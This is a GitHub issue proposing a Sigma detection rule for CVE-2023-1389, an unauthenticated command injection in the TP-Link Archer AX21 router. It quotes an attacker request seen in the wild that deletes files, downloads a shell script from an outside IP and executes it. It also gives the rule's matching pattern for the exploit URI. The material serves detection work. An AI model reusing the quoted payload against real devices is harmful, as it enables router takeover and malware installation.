Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-1389 Unauthenticated Command Injection Vulnerability #4742

Open
cY83rR0H1t opened this issue Feb 28, 2024 · 0 comments
Open

CVE-2023-1389 Unauthenticated Command Injection Vulnerability #4742

cY83rR0H1t opened this issue Feb 28, 2024 · 0 comments
Assignees

Comments

@cY83rR0H1t
Copy link

Description of the Idea of the Rule

A security vulnerability was identified in the TP-Link Archer AX21 (AX1800). This vulnerability involves a command injection flaw present in the country form of the /cgi-bin/luci;stok=/locale endpoint within the web management interface. The issue arises from inadequate sanitization of the country parameter during a write operation, leading to its use in a call to popen(). Consequently, an unauthorized attacker can exploit this vulnerability by sending a simple GET request to inject arbitrary commands. The injected commands run with root privileges, posing a risk to the system's security.

I have seen this exploit query in my client environment recently.
Attacker command:- /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm -rf *; cd /tmp; wget hxxp://45.142.214.108/tenda.sh; chmod 777 tenda.sh; ./tenda.sh)

Public References / Example Event Log

https://voyag3r-security.medium.com/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94

title: CVE-2023-1389 Unauthenticated Command Injection Vulnerability
id: 59cf3413-8816-4beb-a04c-3d207ad0ab27
status: experimental
description: Detect CVE-2023-1389 TP-Link Archer AX21 RCE
references:
    - https://voyag3r-security.medium.com/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94
author: Rohit Jain
date: 2024/02/28
logsource:
    category: webserver
detection:
    selection:
        cs-method: GET
        cs-uri-query: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(
    condition: selection
falsepositives:
    - Unknown
level: medium
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants